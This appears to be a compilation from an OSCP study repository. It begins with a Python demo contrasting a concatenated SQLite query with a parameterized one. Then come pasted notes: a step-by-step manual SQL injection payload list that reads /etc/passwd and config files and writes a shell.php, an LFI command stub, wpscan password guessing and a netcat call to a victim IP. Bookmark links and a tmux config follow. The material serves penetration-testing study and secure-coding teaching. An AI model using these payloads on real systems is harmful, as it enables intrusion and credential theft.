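Both the SQL file's "Manual sql injection commands" and the Web file's "SQL Injection (manual)" section work the same way: the `id` parameter is pasted into the query text, so a `union select` can append rows from any table. The added example below (Python with the standard-library `sqlite3`, not code from the OSCP-Treasure-Cave notes) builds a tiny constructed `photos`/`users` schema, runs the union payload against a string-concatenated query and against the same query with a bound parameter, and adds the type check that a numeric id should have anyway. MySQL's `concat(name,0x3a,password)` is written as `name || ':' || password` because SQLite uses `||` for concatenation.

```python
import sqlite3

# Union payload in the shape used throughout the notes; SQLite spelling of concat(name,0x3a,password).
UNION_PAYLOAD = "1 union select 1, name || ':' || password from users -- -"


def build_demo_db():
    """Constructed in-memory schema with a public table and a table that must stay private."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE photos (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO photos VALUES (?, ?)", [(1, "sunset"), (2, "harbour")])
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "hash-A-constructed"), ("bob", "hash-B-constructed")])
    return conn


def lookup_vulnerable(conn, id_param):
    """String concatenation: the request parameter becomes part of the SQL text,
    so a union in the parameter changes what the statement selects."""
    sql = "SELECT id, title FROM photos WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, id_param):
    """Bound parameter: the value is sent separately from the statement and can
    never alter its structure; a union payload is just an id that matches nothing."""
    return conn.execute("SELECT id, title FROM photos WHERE id=?", (id_param,)).fetchall()


def lookup_validated(conn, id_param):
    """Defence in depth: a photo id must be a positive integer before it is even bound."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    return lookup_parameterized(conn, int(id_param))


def is_rejected(conn, id_param):
    """True when the validated lookup refuses the value."""
    try:
        lookup_validated(conn, id_param)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_demo_db()
    print("concatenated :", lookup_vulnerable(db, UNION_PAYLOAD))
    print("parameterized:", lookup_parameterized(db, UNION_PAYLOAD))
    print("validated    :", "rejected" if is_rejected(db, UNION_PAYLOAD) else "accepted")
```

The concatenated query returns the `users` rows next to the photo row; the parameterized one returns nothing for the same input and still returns the photo for `"1"`, which is the whole difference between the two.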
# LFI and RCE

# Inject code execution


# Go to LFI vuln and
?=…….&cmd=ls

----------------------------------------------
# SQL Injection (manual)
photoalbum.php?id=1'

# find the number of columns
photoalbum.php?id=1 order by 8

# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8

# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8

# Get version
?id=1 union select 1,2,3,4,version(),6,7,8

# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables

# Get all columns from a specific table
?id=1 union select 1,2,3, column_name ,5,6,7,8 from information_schema.columns where table_name='users'
?id=1 union select 1,2,3, group_concat(column_name) ,5,6,7,8 from information_schema.columns where table_name='users'
.. 1,2,3, group_concat(user_id, 0x3a, first_name, 0x3a, last_name, 0x3a, email, 0x3a, pass, 0x3a, user_level) ,5,6,7,8 from users

# view files
' union select 1,2,3, load_file('/etc/passwd') ,5,6,7,8 -- -
' union select 1,2,3, load_file('/var/www/login.php') ,5,6,7,8 -- -
' union select 1,2,3, load_file('/var/www/includes/config.inc.php') ,5,6,7,8 -- -
' union select 1,2,3, load_file('/var/www/mysqli_connect.php') ,5,6,7,8 -- -

# upload files
' union select 1,2,3, 'this is a test message' ,5,6,7,8 into outfile '/var/www/test' -- -
' union select 1,2,3, load_file('/var/www/test') ,5,6,7,8 -- -
' union select null,null,null, "" ,5,6,7,8 into outfile '/var/www/shell.php' -- -
' union select null,null,null, load_file('/var/www/shell.php') ,5,6,7,8 -- -

----------------------------------------------

# wordpress
wpscan --url http://.... --log
wpscan --url http://... --enumerate u --log
wpscan --url http:// --wordlist wordlist.txt --username example_username
http://....../wp-admin
http://...../wp-content/uploads/2017/10/file.png

----------------------------------------------
# Windows Command Execution (RFI exploit)

# Connect via netcat to victim (nc -nv <[IP]> <[PORT]>) and send

# on kali call the shell
nc -nv 10.11.25.59 4444

--------------------------------------------------------------------------------
/Websites/Basic Linux Privilege Escalation.webloc:
--------------------------------------------------------------------------------
URL
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

--------------------------------------------------------------------------------
/Websites/Manifesto - ScriptDotSh.webloc:
--------------------------------------------------------------------------------
URL
https://scriptdotsh.com/

--------------------------------------------------------------------------------
/Websites/OSCP & Cyber Stuff - Dropbox.webloc:
--------------------------------------------------------------------------------
URL
https://www.dropbox.com/sh/ba0t59c5fnccgms/AACvUbUSflWB1_AAgj8okEUra?dl=0&lst=

--------------------------------------------------------------------------------
/Websites/Offensive Security Student Support.webloc:
--------------------------------------------------------------------------------
URL
https://support.offensive-security.com/#!oscp-exam-guide.md

--------------------------------------------------------------------------------
/Websites/PGP Decrypt, Remove whitespace - CyberChef.webloc:
--------------------------------------------------------------------------------
URL
https://gchq.github.io/CyberChef/#recipe=PGP_Decrypt('',''/disabled)Remove_whitespace(true,true,true,true,true,false/disabled)

--------------------------------------------------------------------------------
/Websites/SU-Courses:CIS643-ComputerSecutiry:References at master · Ider:SU-Courses.webloc:
--------------------------------------------------------------------------------
URL
https://github.com/Ider/SU-Courses/tree/master/CIS643-ComputerSecutiry/References

--------------------------------------------------------------------------------
/Websites/Welcome [Root Me - Hacking and Information Security learning platform].webloc:
--------------------------------------------------------------------------------
URL
https://www.root-me.org/?lang=en

--------------------------------------------------------------------------------
/Websites/netsecstudents- Subreddit for students studying Network Security and its related subjects.webloc:
--------------------------------------------------------------------------------
URL
https://www.reddit.com/r/netsecstudents/

--------------------------------------------------------------------------------
/eBooks-Links/Introduction · Security - My notepad.webloc:
--------------------------------------------------------------------------------
URL
https://xapax.gitbooks.io/security/content/

--------------------------------------------------------------------------------
/eBooks-Links/OWASP Testing Guide.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/executeatwill/OSCP-Treasure-Cave/c3e706a3527d1887b4f8462932e4372bab06d418/eBooks-Links/OWASP Testing Guide.pdf

--------------------------------------------------------------------------------
/tmux/How do I scroll in tmux? - Super User.webloc:
--------------------------------------------------------------------------------
URL
https://superuser.com/questions/209437/how-do-i-scroll-in-tmux

--------------------------------------------------------------------------------
/tmux/tmux copy paste with mouse | Awhan Patnaik.webloc:
--------------------------------------------------------------------------------
URL
https://awhan.wordpress.com/2012/04/18/tmux-copy-paste-with-mouse/

--------------------------------------------------------------------------------
/tmux/tmux shortcuts & cheatsheet · GitHub.webloc:
--------------------------------------------------------------------------------
URL
https://gist.github.com/MohamedAlaa/2961058

--------------------------------------------------------------------------------
/tmux/tmux.conf:
--------------------------------------------------------------------------------
# execatwill tmux config
# Few tweaks to configuration file
# to use copy to ~/.tmux.conf

# remap prefix from 'C-b' to 'C-a'
unbind C-b
set-option -g prefix C-a
bind-key C-a send-prefix

# Sane scrolling
set -g terminal-overrides 'xterm*:smcup@:rmcup@'

# Quality of life stuff
set -g history-limit 10000
set -g allow-rename off

# Search Mode VI
set-window-option -g mode-keys vi

# Save pane log with Prefix + alt + shift + p
run-shell /opt/tmux-logging/logging.tmux

# from hamvoke guide to customizing your tmux
# Enable mouse mode (tmux 2.1 and above)
set -g mouse on


# from github greatest tmux config
# 0 is too far from ` ;)
set -g base-index 1

#set -g default-terminal screen-256color
set -g status-keys vi
set -g history-limit 10000

setw -g mode-keys vi
setw -g monitor-activity on

bind-key v split-window -h
bind-key s split-window -v

bind-key J resize-pane -D 5
bind-key K resize-pane -U 5
bind-key H resize-pane -L 5
bind-key L resize-pane -R 5

bind-key M-j resize-pane -D
bind-key M-k resize-pane -U
bind-key M-h resize-pane -L
bind-key M-l resize-pane -R

# Vim style pane selection
bind h select-pane -L
bind j select-pane -D
bind k select-pane -U
bind l select-pane -R

# Use Alt-vim keys without prefix key to switch panes
bind -n M-h select-pane -L
bind -n M-j select-pane -D
bind -n M-k select-pane -U
bind -n M-l select-pane -R

# Use Alt-arrow keys without prefix key to switch panes
bind -n M-Left select-pane -L
bind -n M-Right select-pane -R
bind -n M-Up select-pane -U
bind -n M-Down select-pane -D

# Shift arrow to switch windows
bind -n S-Left previous-window
bind -n S-Right next-window

# No delay for escape key press
set -sg escape-time 0

# Reload tmux config
bind r source-file ~/.tmux.conf

# THEME
set -g status-bg black
set -g status-fg white
set -g window-status-current-bg white
set -g window-status-current-fg black
set -g window-status-current-attr bold
set -g status-interval 60
set -g status-left-length 30
set -g status-left '#[fg=green](#S) #(whoami)'
set -g status-right '#[fg=yellow]#(cut -d " " -f 1-3 /proc/loadavg)#[default] #[fg=white]%H:%M#[default]'
--------------------------------------------------------------------------------